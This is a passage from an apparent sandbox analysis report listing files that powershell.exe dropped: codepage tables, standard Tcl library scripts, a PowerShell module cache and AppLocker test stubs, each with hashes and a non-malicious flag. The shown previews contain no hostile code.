                                                                                                                                                                                                                Preview:# Encoding file: cp850, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5..00C900E600C600F400F600F200FB00F900FF00D600DC00F800A300D800D70192..00E100ED00F300FA00F100D100AA00BA00BF00AE00AC00BD00BC00A100AB00BB..2591259225932502252400C100C200C000A9256325512557255D00A200A52510..25142534252C251C2500253C00E300C3255A25542569256625602550256C00A4..00F000D000CA00CB00C8013100CD00CE00CF2518250C2588258400A600CC2580..00D300DF00D400D200F500
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1110
                                                                                                                                                                                                                Entropy (8bit):3.4509005787389877
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:CPHVBUlJvRj7SOVbusZhAMiZyi77q7EUsOtycwQIc+922V:mMlBVnrAMiwMmwvOtycwQIc+9R
                                                                                                                                                                                                                MD5:48402B424B5101BDEEB0192BBA96DB7D
                                                                                                                                                                                                                SHA1:C9EB93A37AF70F4134AA9CF05D914A30FB3201DD
                                                                                                                                                                                                                SHA-256:F3A18A8C7934F6586F023477E08D3F9D5EAD9A45E9E58A3F8D018AF9BB13F868
                                                                                                                                                                                                                SHA-512:4EE615605BFF3D94A7FC4FE23D8288F0F20F6792C8C69ECACABAE82F1A334D8417C5DFFC0DA3702E2DB09B7BE1E5FF19C6A0F460C9A5EC84D1856BB9C8061CA5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp852, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E4016F010700E7014200EB0150015100EE017900C40106..00C90139013A00F400F6013D013E015A015B00D600DC01640165014100D7010D..00E100ED00F300FA01040105017D017E0118011900AC017A010C015F00AB00BB..2591259225932502252400C100C2011A015E256325512557255D017B017C2510..25142534252C251C2500253C01020103255A25542569256625602550256C00A4..01110110010E00CB010F014700CD00CE011B2518250C258825840162016E2580..00D300DF00D40143014401
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1110
                                                                                                                                                                                                                Entropy (8bit):3.4277025591531864
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:CoHVBUlJvRj7SOVbusZhAMiZyi77qLHVWjwk/rMZC032SLnD2JbD:hMlBVnrAMiwMmx8whM03VLDy
                                                                                                                                                                                                                MD5:8B8AA56F83BA750EB73FAE542E76FF1A
                                                                                                                                                                                                                SHA1:2F3C3BA4B854A7D6B0A3D27BC519EE66A042E05A
                                                                                                                                                                                                                SHA-256:E64FD2E639DA6F654D9BFBB2266F9432259A6A55941622F5CDDC3797E382EB0A
                                                                                                                                                                                                                SHA-512:8B4061176663F7AC01B3969D25F680B5870A8EAD864CFAD897F18E75409CE721E6CC367A88EBABAF72E77D4542EE1894F2A6EE47A43FB3D4C650CFA18DFD3D71
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp855, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0452040204530403045104010454040404550405045604060457040704580408..04590409045A040A045B040B045C040C045E040E045F040F044E042E044A042A..0430041004310411044604260434041404350415044404240433041300AB00BB..259125922593250225240445042504380418256325512557255D043904192510..25142534252C251C2500253C043A041A255A25542569256625602550256C00A4..043B041B043C041C043D041D043E041E043F2518250C25882584041F044F2580..042F044004200441042104
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1110
                                                                                                                                                                                                                Entropy (8bit):3.364496856690505
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:CaHVBUlJvRj7SOVbusZhAMiZyi77qZpu6uUV5Dw5LeBCVHjzA:jMlBVnrAMiwMmyUVFw5SYdI
                                                                                                                                                                                                                MD5:BA52A031DE1B1A6ED1C41BED8946750C
                                                                                                                                                                                                                SHA1:BD54C0E2F62FD36675892A61FD8B340A56845D20
                                                                                                                                                                                                                SHA-256:B6CD5C6F2B54D89142679D599ED0A5DEE6955A3B3F6B6673E46AFE7A5A303CDC
                                                                                                                                                                                                                SHA-512:5F915AABE39F31CE9337B4B9B0239DF8ADA898D2D9F111DD09D97689DB89CF45B093AC187FC28484CFB213D14B0D8F58C5668D0A59726282D6F52D5D24697816
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp857, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE013100C400C5..00C900E600C600F400F600F200FB00F9013000D600DC00F800A300D8015E015F..00E100ED00F300FA00F100D1011E011F00BF00AE00AC00BD00BC00A100AB00BB..2591259225932502252400C100C200C000A9256325512557255D00A200A52510..25142534252C251C2500253C00E300C3255A25542569256625602550256C00A4..00BA00AA00CA00CB00C8000000CD00CE00CF2518250C2588258400A600CC2580..00D300DF00D400D200F500
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1110
                                                                                                                                                                                                                Entropy (8bit):3.506813480871637
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:CMHVBUlJvRj7SOVbusZhAMiZyi77qij4Axlt49Y18wDyV8mK:VMlBVnrAMiwMm/g+9Y1LmK
                                                                                                                                                                                                                MD5:C416471B57FB894DC45D30C31B4BD2E2
                                                                                                                                                                                                                SHA1:BA378F8122280992AE51245A06814D8155564220
                                                                                                                                                                                                                SHA-256:804EFA345C5BBBAD2449C318A7A3F5B31F4234712AAD23DC49B3FB5AA33B7A57
                                                                                                                                                                                                                SHA-512:E7CDE706CFE573525C2DE319AD5783AE9D97C4F6D28B14A77A729F281540B0DAFAD4C14879EF76473BFDEBC38499C65CA228470983F2D1BC31938A91A2486522
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: cp860, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E300E000C100E700EA00CA00E800CD00D400EC00C300C2..00C900C000C800F400F500F200DA00F900CC00D500DC00A200A300D920A700D3..00E100ED00F300FA00F100D100AA00BA00BF00D200AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11707
                                                                                                                                                                                                                Entropy (8bit):5.03328629946697
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:rXlm2LnoZ7k2mOEhYoKVtWD2xLsmF+MNlPQ4lJ+B0O0DgryYY/+zy7go:rXlm2Lng7kvF2VtWD2xLeMNT+B0O0Urk
                                                                                                                                                                                                                MD5:A0B269D76DB613C2D927EFA84FEE88E2
                                                                                                                                                                                                                SHA1:F9C7AD375F4D4223F0668FA1E2C4E5A83CAC2D03
                                                                                                                                                                                                                SHA-256:32348D51F3637F375B056FE99E9B4D89D85D45DB907847DC370BD72812A2E2FE
                                                                                                                                                                                                                SHA-512:5427762147825DC2ED3FEEE4011BBF2100932A4D93F3242CCAD15499C9DC39F42A82AEB42ED5DB5839560CD7AAE5D30621AC3694552FFC650A1F572CEE32FA54
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Heuristics to assemble a platform identifier from publicly available..# information. The identifier describes the platform of the currently..# running tcl shell. This is a mixture of the runtime environment and..# of build-time properties of the executable itself...#..# Examples:..# <1> A tcl shell executing on a x86_64 processor, but having a..# wordsize of 4 was compiled for the x86 environment, i.e. 32..# bit, and loaded packages have to match that, and not the..# actual cpu...#..# <2> The hp/solaris 32/64 bit builds of the core cannot be..# distinguished by looking at tcl_platform. As packages have to..# match the 32/64 information we have to look in more places. In..# this case we inspect the executable itself (magic numbers,..# i.e. fileutil::magic::filetype)...#..# The basic information used comes out of the 'os' and 'machine'..# entries of the 'tcl_platform' array. A number of general and
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6218
                                                                                                                                                                                                                Entropy (8bit):4.843141834641668
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:PV5U+VLnNUPVvH+knNUPVUHD5ngWftN+IgMufIdqi+g0SYiCXVDjqL:Nm6MFXN5uwq51iCFD2
                                                                                                                                                                                                                MD5:8ABC3029963E433D1D9865AAA7E1057B
                                                                                                                                                                                                                SHA1:A88091DC98B2FD0AE3A258B59F8BE43F41F04323
                                                                                                                                                                                                                SHA-256:0A6B4B109CFDFC4B40FBDEFDB2282F9B1AF3CC2F9624DD39958EEBD78781AFB2
                                                                                                                                                                                                                SHA-512:D5068375615A2200DDC13EEB852B2E21B7E4AA416FB7A0E97C98B8B106D7701792C523739E8BF266D2ABE411D4298A0B5B3884CFB9DF820FD4A2B61B22F9DECF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:..# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Higher-level commands which invoke the functionality of this package..# for an arbitrary tcl shell (tclsh, wish, ...). This is required by a..# repository as while the tcl shell executing packages uses the same..# platform in general as a repository application there can be..# differences in detail (i.e. 32/64 bit builds).....# ### ### ### ######### ######### #########..## Requirements....package require platform..namespace eval ::platform::shell {}....# ### ### ### ######### ######### #########..## Implementation....# -- platform::shell::generic....proc ::platform::shell::generic {shell} {.. # Argument is the path to a tcl shell..... CHECK $shell.. LOCATE base out.... set code {}.. # Forget any pre-existing platform package, it might be in.. # conflict with this one... lappend code {package forget platform}.. # Inject our platform package.. lappend code [list source $base]..
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):35136
                                                                                                                                                                                                                Entropy (8bit):4.945501767273492
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:m3xQvCzasI/rHPG2yfkZ0Kbh91iQ3Lnq5MIVYB8mbgijsPIWtw4qvUm:4xQvCzasIDHPG2yW0kJ32imXmUij6JjG
                                                                                                                                                                                                                MD5:BD4FF2A1F742D9E6E699EEEE5E678AD1
                                                                                                                                                                                                                SHA1:811AD83AFF80131BA73ABC546C6BD78453BF3EB9
                                                                                                                                                                                                                SHA-256:6774519F179872EC5292523F2788B77B2B839E15665037E097A0D4EDDDD1C6FB
                                                                                                                                                                                                                SHA-512:B77E4A68017BA57C06876B21B8110C636F9BA1DD0BA9D7A0C50096F3F6391508CF3562DD94ACEAF673113DBD336109DA958044AEFAC0AFB0F833A652E4438F43
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# msgcat.tcl --..#..#.This file defines various procedures which implement a..#.message catalog facility for Tcl programs. It should be..#.loaded with the command "package require msgcat"...#..# Copyright (c) 2010-2015 Harald Oehlmann...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 1998 Mark Harrison...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.5-..# When the version number changes, be sure to update the pkgIndex.tcl file,..# and the installation directory in the Makefiles...package provide msgcat 1.6.1....namespace eval msgcat {.. namespace export mc mcexists mcload mclocale mcmax mcmset mcpreferences mcset\.. mcunknown mcflset mcflmset mcloadedlocales mcforgetpackage\... mcpackageconfig mcpackagelocale.... # Records the list of locales to search.. variable Loclist {}.... # List of currently loaded locales.. variable LoadedLoc
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:Tcl script, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):107674
                                                                                                                                                                                                                Entropy (8bit):4.841458743618635
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:74s6YTLsaoi4N8uBPM5PP9AlGXJL/ciBh:7N6Y9oi4N8uBPM5PP9AYXJL/ciBh
                                                                                                                                                                                                                MD5:655EC828777244F9F048E0D08203482F
                                                                                                                                                                                                                SHA1:790446D04FE7BE12FD5DCF6E6FBD4C5A08C45C98
                                                                                                                                                                                                                SHA-256:35A88F56DF57E6AC6F2CCC4D193210FBB9BD224AC99670603E077DDF8C5610BC
                                                                                                                                                                                                                SHA-512:C249CAA5DA76A0B0876DD1BD201FF2D249D4FCD8467992C9DE51BA5A1C5471F98C10D69C46DF5B25DBA7941F4301B446D90CBF17BCCFB8B0ED27B22BF4DA20F3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# tcltest.tcl --..#..#.This file contains support code for the Tcl test suite. It..# defines the tcltest namespace and finds and defines the output..# directory, constraints available, output and error channels,..#.etc. used by Tcl tests. See the tcltest man page for more..#.details...#..# This design was based on the Tcl testing approach designed and..# initially implemented by Mary Ann May-Pumphrey of Sun..#.Microsystems...#..# Copyright . 1994-1997 Sun Microsystems, Inc...# Copyright . 1998-1999 Scriptics Corporation...# Copyright . 2000 Ajuba Solutions..# Contributions from Don Porter, NIST, 2002. (not subject to US copyright)..# All rights reserved.....package require Tcl 8.5-..;# -verbose line uses [info frame]..namespace eval tcltest {.... # When the version number changes, be sure to update the pkgIndex.tcl file,.. # and the install directory in the Makefiles. When the minor version.. # changes (new feature) be sure to update the man page
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):118419
                                                                                                                                                                                                                Entropy (8bit):4.888789841897662
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:RYY1IO/KuUhIW17zr1DLJuuBuFsj6aIsGc3e6xGxjndp72y4ebBxIQ30Ik:RbyOCuUv9r5LJmsjlxTxGxjndpCBeAQ0
                                                                                                                                                                                                                MD5:ACB85FEB97B27F1362E1D76B686D498F
                                                                                                                                                                                                                SHA1:92C370F838BD67C72E153FBF7AD05E26FF40A393
                                                                                                                                                                                                                SHA-256:7A30E7A49C1F6939537EB7A80CF2F5BC7A4969F2B2AD99BA4E26DB85BBC2FCC7
                                                                                                                                                                                                                SHA-512:EA504863386817E1B21549376148FD05C7EAF74F91A3A8DA97EFCF3784530ED3CF1910DF9B2431EC47D1175759CDEB1A0E9E9E02BBA94EC2123EAFB7CBD2B90A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# http.tcl --..#..#.Client-side HTTP for GET, POST, and HEAD commands. These routines can..#.be used in untrusted code that uses the Safesock security policy...#.These procedures use a callback interface to avoid using vwait, which..#.is not defined in the safe base...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.6-..# Keep this in sync with pkgIndex.tcl and with the install directories in..# Makefiles..package provide http 2.9.8....namespace eval http {.. # Allow resourcing to not clobber existing data.... variable http.. if {![info exists http]} {...array set http {... -accept */*... -pipeline 1... -postfresh 0... -proxyhost {}... -proxyport {}... -proxyfilter http::ProxyRequired... -repost 0... -urlencoding utf-8... -zip 1...}...# We need a useragent string of this style or various servers will...# refuse to send us compressed content
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9434
                                                                                                                                                                                                                Entropy (8bit):4.928515784730612
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                                                                                                                MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                                                                                                                SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                                                                                                                SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                                                                                                                SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:@...e...........................................................
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
